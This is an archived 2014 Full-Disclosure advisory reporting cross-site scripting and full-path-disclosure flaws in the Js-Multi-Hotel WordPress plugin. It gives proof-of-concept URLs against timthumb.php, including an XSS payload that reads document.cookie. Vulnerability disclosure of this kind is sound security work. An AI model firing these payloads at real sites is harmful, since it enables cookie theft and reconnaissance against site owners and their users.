| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <006d01cf4b57$764b7b90$9b7a6fd5@pc> Date: Sat, 29 Mar 2014 16:01:58 +0200 From: "MustLive" <mustlive@...security.com.ua> To: <submissions@...ketstormsecurity.org>, <fulldisclosure@...lists.org> Subject: [FD] XSS and FPD vulnerabilities in Js-Multi-Hotel for WordPress Hello list! These are vulnerabilities in Js-Multi-Hotel plugin for WordPress. ------------------------- Affected products: ------------------------- Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions. ------------------------- Affected vendors: ------------------------- Joomlaskin http://wordpress.org ---------- Details: ---------- Cross-Site Scripting (WASC-08): http://site/wp-content/plugins/js-multihotel/includes/timthumb.php?src=%3C%3Cbody%20onload=alert(document.cookie)%3E Full path disclosure (WASC-13): http://site/wp-content/plugins/js-multihotel/includes/timthumb.php?src=http:// I have disclosed it at my site (http://websecurity.com.ua/7082/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists